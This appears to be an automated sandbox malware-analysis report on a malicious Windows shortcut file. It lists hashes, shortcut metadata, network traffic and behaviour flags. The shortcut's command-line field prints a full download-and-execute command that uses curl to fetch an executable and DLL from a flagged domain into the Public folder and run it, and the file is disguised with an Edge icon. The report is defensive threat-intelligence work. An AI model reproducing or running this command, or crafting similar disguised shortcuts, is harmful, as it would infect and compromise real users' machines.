File name:	0dcef9d1e1cd96ed5b19c0befa1e6e7f.lnk
Full analysis:	https://app.any.run/tasks/3ad4be79-b6e5-4ed6-aad2-78732a24caad
Verdict:	Malicious activity
Analysis date:	August 01, 2025, 04:34:43
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	susp-lnk
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe", MachineID desktop-o6c6o1g KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Fri May 23 10:14:32 2025, atime=Fri Jul 4 06:39:33 2025, mtime=Fri May 23 10:14:32 2025, length=289792, window=showminnoactive, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5:	0DCEF9D1E1CD96ED5B19C0BEFA1E6E7F
SHA1:	F10746F3D1D1B8380B2469DFD00F381D4F65708F
SHA256:	14137558073301053CCB26440D07E2DEF8A0ADD9029D42C4BF0776BF3C0F5659
SSDEEP:	24:8N/QEZsxvmIwMAmA+/OE4K1ZHb14xSj1ZHoTyMddkXuHYLEQDxpeS:8yP8LZE/b71SSjbaHdaXuHhQSS

Flags:	IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes:	Archive
CreateDate:	2025:05:23 10:14:32+00:00
AccessDate:	2025:07:04 06:39:33+00:00
ModifyDate:	2025:05:23 10:14:32+00:00
TargetFileSize:	289792
IconIndex:	11
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	cmd.exe
DriveType:	Fixed Disk
DriveSerialNumber:	D2B4-CC72
VolumeLabel:	-
LocalBasePath:	C:\Windows\System32\cmd.exe
RelativePath:	..\..\..\..\Windows\System32\cmd.exe
CommandLineArguments:	/c curl -o %public%\win.exe https://datamero.org/biuA873q4jIUBoaFibnoianbscoia/sitrie && curl -o %public%\libvlc.dll https://datamero.org/biuA873q4jIUBoaFibnoianbscoia/maikjcef && start "" /b %public%\win.exe
IconFileName:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
MachineID:	desktop-o6c6o1g

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
5944	MoUsoCoreWorker.exe	GET	200	23.48.23.143:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	23.48.23.143:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
6240	RUXIMICS.exe	GET	200	23.48.23.143:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	23.35.229.160:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
5944	MoUsoCoreWorker.exe	GET	200	23.35.229.160:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
6240	RUXIMICS.exe	GET	200	23.35.229.160:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	POST	400	40.126.32.134:443	https://login.live.com/ppsecure/deviceaddcredential.srf	unknown	text	203 b	whitelisted
—	—	POST	400	20.190.160.131:443	https://login.live.com/ppsecure/deviceaddcredential.srf	unknown	text	203 b	whitelisted
—	—	POST	400	20.190.160.65:443	https://login.live.com/ppsecure/deviceaddcredential.srf	unknown	text	203 b	whitelisted
—	—	POST	400	40.126.32.136:443	https://login.live.com/ppsecure/deviceaddcredential.srf	unknown	text	203 b	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
1268	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
5944	MoUsoCoreWorker.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
6240	RUXIMICS.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
3760	curl.exe	188.114.97.3:443	datamero.org	CLOUDFLARENET	NL	malicious
1268	svchost.exe	23.48.23.143:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
5944	MoUsoCoreWorker.exe	23.48.23.143:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
6240	RUXIMICS.exe	23.48.23.143:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
1268	svchost.exe	23.35.229.160:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	4.231.128.59 51.124.78.146 51.104.136.2	whitelisted
google.com	142.250.184.238	whitelisted
datamero.org	188.114.97.3 188.114.96.3	malicious
crl.microsoft.com	23.48.23.143 23.48.23.156	whitelisted
www.microsoft.com	23.35.229.160	whitelisted
login.live.com	40.126.32.68 40.126.32.72 20.190.160.5 20.190.160.17 20.190.160.14 20.190.160.130 40.126.32.76 20.190.160.128	whitelisted
client.wns.windows.com	172.211.123.249	whitelisted
slscr.update.microsoft.com	52.149.20.212	whitelisted
fe3cr.delivery.mp.microsoft.com	13.95.31.18	whitelisted
self.events.data.microsoft.com	20.189.173.16	whitelisted

General Info

0dcef9d1e1cd96ed5b19c0befa1e6e7f.lnk

0DCEF9D1E1CD96ED5B19C0BEFA1E6E7F

F10746F3D1D1B8380B2469DFD00F381D4F65708F

14137558073301053CCB26440D07E2DEF8A0ADD9029D42C4BF0776BF3C0F5659

24:8N/QEZsxvmIwMAmA+/OE4K1ZHb14xSj1ZHoTyMddkXuHYLEQDxpeS:8yP8LZE/b71SSjbaHdaXuHhQSS

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Starts windows command line (LNK)

SUSPICIOUS

Likely accesses (executes) a file from the Public directory

INFO

Reads the computer name

Checks proxy server information

Checks supported languages

Execution of CURL command

Reads the software policy settings

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings